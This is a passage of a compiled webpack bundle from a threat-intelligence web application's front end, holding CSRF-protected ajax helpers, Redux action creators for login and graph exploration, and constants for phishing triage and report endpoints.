        rest = _objectWithoutProperties(_ref2, ['headers']);

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(Object.assign({}, _extends({}, rest, {
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    })));
  };

  /**
   * Manually pass in the ajax helpers. This makes testing epics easier because we
   * can very easily mock this interface for testing purposes by passing the
   * dependencies in to the epics directly during testing. See some of the epic
   * tests for examples.
   */
  ajax.get = function (url, headers, config) {
    var endpoint = __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      method: 'GET',
      url: endpoint,
      withCredentials: true,
      crossDomain: true,
      'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])(),
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  ajax.getJSON = function (url, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      method: 'GET',
      responseType: 'json',
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      withCredentials: true,
      crossDomain: true,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  ajax.delete = function (url, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      method: 'DELETE',
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      withCredentials: true,
      crossDomain: true,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  ajax.put = function (url, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      method: 'PUT',
      withCredentials: true,
      crossDomain: true,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  ajax.post = function (url, body, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      method: 'POST',
      responseType: 'json',
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      withCredentials: true,
      crossDomain: true,
      body: body,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  ajax.putJSON = function (url, body, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      method: 'PUT',
      withCredentials: true,
      crossDomain: true,
      body: body,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])(),
        'Content-Type': 'application/json; charset=UTF-8'
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  /**
   * Post some JSON to the server. This is entirely equivalent to
   * Observable.ajax.post except it defaults the content type to json instead of
   * form-urlencoded. Currently our back end will throw 500 if we do not do this.
   *
   * NOTE: This is the only method so far that is NOT part of the Observable.ajax
   * API. This is custom
   *
   * (url: string, body: ?Object, headers: ?Object) => Observable<*>;
   */
  ajax.postJSON = function (url, body, headers, config) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax(_extends({
      method: 'POST',
      body: body,
      responseType: 'json',
      url: __WEBPACK_IMPORTED_MODULE_4__constants__["d" /* TRUSTAR_API_HOST */] + url,
      withCredentials: true,
      crossDomain: true,
      headers: _extends({
        'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])(),
        'Content-Type': 'application/json; charset=UTF-8'
      }, headers)
    }, config)).do(null, onRequestFailure);
  };

  /**
   * Like postJSON but uses form URL encoding. This is useful for interop with
   * Spring's @RequestParam decorator which does NOT like JSON even a little bit.
   */
  ajax.postForm = function (url, body, headers) {
    var formBody = new URLSearchParams();

    Object.keys(body).forEach(function (k) {
      formBody.set(k, body[k]);
    });

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].ajax.post(url, formBody.toString(), _extends({
      'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'X-XSRF-TOKEN': Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getCsrfToken"])()
    }, headers));
  };

  return ajax;
};

/* NOTE: Without a state transformer the logger will always log our immutable
* state which is an instance of Immutable.Map. This will not prove very
* useful unless you install the formatter extension:
* https://github.com/mattzeunert/immutable-object-formatter-extension
*
* The reason for not providing a state transformer is that calling toJS on
* our entire app state for EVERY ACTION is actually a fairly intensive
* blocking computation on our single thread. This means that the dev
* environment will be considerably slower if you call toJS on state every
* action.
*/

var LoggerConfig = {
  collapsed: true,
  timestamp: false,
  duration: true,
  diff: false,
  level: {
    prevState: false,
    action: function action() {
      return 'log';
    },
    nextState: function nextState() {
      return 'log';
    },
    error: function error() {
      return 'log';
    }
  },
  colors: {
    title: function title() {
      return '#2A9DEF';
    },
    prevState: function prevState() {
      return '#FFE661';
    },
    action: function action() {
      return '#FB505D';
    },
    nextState: function nextState() {
      return '#2DD88A';
    },
    error: function error() {
      return '#FB1C2C';
    }
  },
  predicate: function predicate(getState, _ref3) {
    var type = _ref3.type;


    /* NOTE: Filter certain Redux-Form acitons,
     * there are a lot and they slow down the UI
     *
     */

    if (type === '@@redux-form/CHANGE' || type === '@@redux-form/REGISTER_FIELD' || type === '@@redux-form/UNREGISTER_FIELD') return false;
    return true;
  }
};

/***/ }),
/* 569 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "initialize", function() { return initialize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "closeTimeoutWarning", function() { return closeTimeoutWarning; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setOptions", function() { return setOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setThemeFromPreferences", function() { return setThemeFromPreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setActivity", function() { return setActivity; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setLastRoute", function() { return setLastRoute; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "confirm", function() { return confirm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "login", function() { return login; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "logout", function() { return logout; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "acceptTerms", function() { return acceptTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "declineTerms", function() { return declineTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "changePasswordUpdateCredentials", function() { return changePasswordUpdateCredentials; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mfaVerifyResponse", function() { return mfaVerifyResponse; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "changePassword", function() { return changePassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "forgotPassword", function() { return forgotPassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearLoginStatusMessage", function() { return clearLoginStatusMessage; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "forceLogin", function() { return forceLogin; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "didLoginViaSSO", function() { return didLoginViaSSO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clipboardCopy", function() { return clipboardCopy; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "verifyAuth", function() { return verifyAuth; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types__ = __webpack_require__(134);




var initialize = function initialize() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["INITIALIZE"] };
};

var closeTimeoutWarning = function closeTimeoutWarning() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SET_TIMEOUT_WARNING"],
    payload: false
  };
};

var setOptions = function setOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SET_OPTIONS"],
    payload: options
  };
};

var setThemeFromPreferences = function setThemeFromPreferences(themeFromPreferences) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SET_THEME_FROM_PREFERENCES"],
    payload: themeFromPreferences
  };
};

var setActivity = function setActivity(activity) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SET_ACTIVITY"],
    payload: activity
  };
};

var setLastRoute = function setLastRoute(route) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SET_LAST_ROUTE"],
    payload: route
  };
};

var confirm = function confirm(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["CONFIRMATION"],
    payload: payload
  };
};

var login = function login(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["LOGIN"],
    payload: payload
  };
};

var logout = function logout(comingFrom) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["LOGOUT"],
    payload: comingFrom
  };
};

var acceptTerms = function acceptTerms() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["ACCEPT_TERMS"]
  };
};

var declineTerms = function declineTerms() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["DECLINE_TERMS"]
  };
};

var changePasswordUpdateCredentials = function changePasswordUpdateCredentials(password) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["CHANGE_PASSWORD_CREDENTIALS_UPDATE"],
    payload: password
  };
};

var mfaVerifyResponse = function mfaVerifyResponse(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["MFA_VERIFY_RESPONSE"],
    payload: payload
  };
};

var changePassword = function changePassword(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["CHANGE_PASSWORD"],
    payload: payload
  };
};

var forgotPassword = function forgotPassword(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["FORGOT_PASSWORD"],
    payload: payload
  };
};

var clearLoginStatusMessage = function clearLoginStatusMessage() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["LOGIN_CLEAR_STATUS_MESSAGE"]
  };
};

var forceLogin = function forceLogin() {
  var intendedPath = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '/';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["FORCE_LOGIN"],
    payload: intendedPath
  };
};

var didLoginViaSSO = function didLoginViaSSO() {
  var intendedPath = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '/';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["DID_LOGIN_VIA_SSO"],
    payload: intendedPath
  };
};

var clipboardCopy = function clipboardCopy(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["CLIPBOARD_COPY"],
    payload: payload
  };
};

// Using session endpoint, will replace with WHOAMI endpoint when it's ready on BE
// Verify auth is meant to check if you are authorized before allowing a dozen API calls that will
// result in a 401 / 403 be fired
var verifyAuth = function verifyAuth(comingFrom) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types__["CONFIRM_ALIVE"],
    payload: comingFrom
  };
};

/***/ }),
/* 570 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return PHISHING_TRIAGE_ENCLAVE_TEMPLATE_NAME; });
/* unused harmony export PHISHING_SCORE_VALUES */
/* unused harmony export TRIAGE_STATUS_TO_PHISHING_TAG */
/* unused harmony export TRIAGE_STATUSES */
/* unused harmony export TRIAGE_STATUSES_TO_NAMES */
/* unused harmony export TRIAGE_STATUS_OPTIONS */
/* unused harmony export PHISHING_STATUS_OPTIONS */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return TRIAGE_ENDPOINT; });
/* unused harmony export DOWNLOAD_INDICATOR_CSV_ENDPOINT */
/* unused harmony export PHISHING_INDICATORS_CSV_FILENAME */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DEFAULT_PAGE_SIZE; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);


var PHISHING_TRIAGE_ENCLAVE_TEMPLATE_NAME = 'Phishing Triage';

var PHISHING_SCORE_VALUES = {
  UNRESOLVED: 'UNRESOLVED',
  CONFIRMED: 'CONFIRMED',
  IGNORED: 'IGNORED'
};
var TRIAGE_STATUS_TO_PHISHING_TAG = {
  UNRESOLVED: 'phishing/unresolved',
  CONFIRMED: 'phishing/confirmed',
  IGNORED: 'phishing/ignored'
};

var TRIAGE_STATUSES = {
  UNKNOWN: -1,
  BENIGN: 0,
  LOW: 1,
  MEDIUM: 2,
  HIGH: 3
};

var TRIAGE_STATUSES_TO_NAMES = {
  '-1': 'UNKNOWN',
  '0': 'BENIGN',
  '1': 'LOW',
  '2': 'MEDIUM',
  '3': 'HIGH'
};

var TRIAGE_STATUS_OPTIONS = Object.values(TRIAGE_STATUSES);
var PHISHING_STATUS_OPTIONS = Object.values(PHISHING_SCORE_VALUES);

var TRIAGE_ENDPOINT = '/services/triage/submissions';

var DOWNLOAD_INDICATOR_CSV_ENDPOINT = '/services/triage/export-indicators.csv';
var PHISHING_INDICATORS_CSV_FILENAME = 'phishing-report.csv';

// Currently the page size is fixed on the BE to 25, but this may change
var DEFAULT_PAGE_SIZE = 25;

/***/ }),
/* 571 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchQuotas", function() { return fetchQuotas; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "savePassword", function() { return savePassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "update", function() { return update; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updatePreferences", function() { return updatePreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hideUpsellModal", function() { return hideUpsellModal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "premiumContentLockClick", function() { return premiumContentLockClick; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types__ = __webpack_require__(116);




var fetch = function fetch() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* FETCH */] };
};

var fetchQuotas = function fetchQuotas() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["c" /* FETCH_QUOTAS */] };
};

var savePassword = function savePassword(currentPassword, newPassword) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["i" /* SAVE_PASSWORD */],
    payload: { currentPassword: currentPassword, newPassword: newPassword }
  };
};

var update = function update(profile) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["l" /* UPDATE */],
    payload: profile
  };
};

var updatePreferences = function updatePreferences(preferences) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["n" /* UPDATE_PREFERENCES */],
    payload: preferences
  };
};

var hideUpsellModal = function hideUpsellModal() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* HIDE_UPSELL_MODAL */]
  };
};

var premiumContentLockClick = function premiumContentLockClick(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_2__action_types__["h" /* PREMIUM_CONTENT_LOCK_CLICK */],
    payload: payload
  };
};

/***/ }),
/* 572 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1314);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(359);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2938);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(1320);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 573 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "malwareTerms", function() { return malwareTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQuery", function() { return currentQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultSorterValues", function() { return defaultSorterValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortOptions", function() { return sortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultPayload", function() { return defaultPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultResult", function() { return defaultResult; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var malwareTerms = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['malware', 'terms']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['malware', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['malware', 'modalOpen']);
var currentQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['malware', 'currentQuery']);

var defaultSorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorters: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
    text: 'Newest to Oldest Updated',
    sort: {
      sortBy: 'updated',
      sortDirection: 'DESC' // ASC / DESC
    }
  })
};

var sortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Newest to Oldest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'ASC'
  }
}];

var defaultPayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  query: '',
  sort: defaultSorterValues.searchSorters,
  pageNumber: 0,
  pageSize: 25
});

var defaultResult = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

/***/ }),
/* 574 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "threatActorTerms", function() { return threatActorTerms; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQuery", function() { return currentQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultSorterValues", function() { return defaultSorterValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortOptions", function() { return sortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultPayload", function() { return defaultPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultResult", function() { return defaultResult; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var threatActorTerms = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['threatActors', 'terms']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['threatActors', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['threatActors', 'modalOpen']);
var currentQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['threatActors', 'currentQuery']);

var defaultSorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorters: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
    text: 'Newest to Oldest Updated',
    sort: {
      sortBy: 'updated',
      sortDirection: 'DESC' // ASC / DESC
    }
  })
};

var sortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Newest to Oldest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'ASC'
  }
}];

var defaultPayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  query: '',
  sort: defaultSorterValues.searchSorters,
  pageNumber: 0,
  pageSize: 25
});

var defaultResult = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

/***/ }),
/* 575 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return REPORTS_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return PAGE_SIZE; });
/* unused harmony export CORRELATION_COUNT_LOADING */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return MAX_TAG_LENGTH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return MAX_RETRY_NEW_REPORT_POLLING; });
var REPORTS_ENDPOINT = '/services/incident-reports';
var PAGE_SIZE = 25; // Number of reports to fetch per page
var CORRELATION_COUNT_LOADING = '-';
var MAX_TAG_LENGTH = 90;

var MAX_RETRY_NEW_REPORT_POLLING = 15;

/***/ }),
/* 576 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clear", function() { return clear; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "closeTimeRangeExplanation", function() { return closeTimeRangeExplanation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleNodeSelection", function() { return toggleNodeSelection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "captureNodeClicked", function() { return captureNodeClicked; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "replaceNodeSelection", function() { return replaceNodeSelection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setHoveredNodeId", function() { return setHoveredNodeId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setRootReportNodeId", function() { return setRootReportNodeId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchExplosion", function() { return fetchExplosion; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setOptions", function() { return setOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filterText", function() { return filterText; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleActiveFilter", function() { return toggleActiveFilter; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "undo", function() { return undo; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redo", function() { return redo; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetCurrentGraph", function() { return resetCurrentGraph; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteCurrentSelection", function() { return deleteCurrentSelection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportCurrentGraphIndicatorsInCSV", function() { return exportCurrentGraphIndicatorsInCSV; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateGraphTimeRange", function() { return updateGraphTimeRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "cacheGraphSimulation", function() { return cacheGraphSimulation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveNote", function() { return saveNote; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateNote", function() { return updateNote; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteNote", function() { return deleteNote; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "highlightNode", function() { return highlightNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetHighlightedNode", function() { return resetHighlightedNode; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetBreadcrumbs", function() { return resetBreadcrumbs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "goToBreadcrumb", function() { return goToBreadcrumb; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "addBreadcrumb", function() { return addBreadcrumb; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(143);



var clear = function clear() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* CLEAR */] };
};

var fetch = function fetch(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["m" /* FETCH */],
    payload: payload
  };
};

var closeTimeRangeExplanation = function closeTimeRangeExplanation() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["f" /* CLOSE_TIME_RANGE_EXPLANATION */]
  };
};

/* Toggle a node within our current selection of nodes. */
var toggleNodeSelection = function toggleNodeSelection(nodeId) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["O" /* TOGGLE_NODE */],
    payload: nodeId
  };
};

var captureNodeClicked = function captureNodeClicked(node) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["v" /* NODE_CLICKED */],
    payload: node
  };
};

var replaceNodeSelection = function replaceNodeSelection(nodeIds) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["A" /* REPLACE_SELECTION */],
    payload: nodeIds
  };
};

var setHoveredNodeId = function setHoveredNodeId(nodeId) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["L" /* SET_HOVERED_NODE_ID */],
    payload: nodeId
  };
};

// this isn't used anywhere?
var setRootReportNodeId = function setRootReportNodeId(nodeId) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["N" /* SET_ROOT_NODE_ID */],
    payload: nodeId
  };
};

var fetchExplosion = function fetchExplosion(node) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["n" /* FETCH_EXPLOSION */],
    payload: node
  };
};

var setOptions = function setOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["M" /* SET_OPTIONS */],
    payload: options
  };
};

var filterText = function filterText(filters, id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["J" /* SET_FILTERS */],
    payload: { id: id, filters: filters }
  };
};

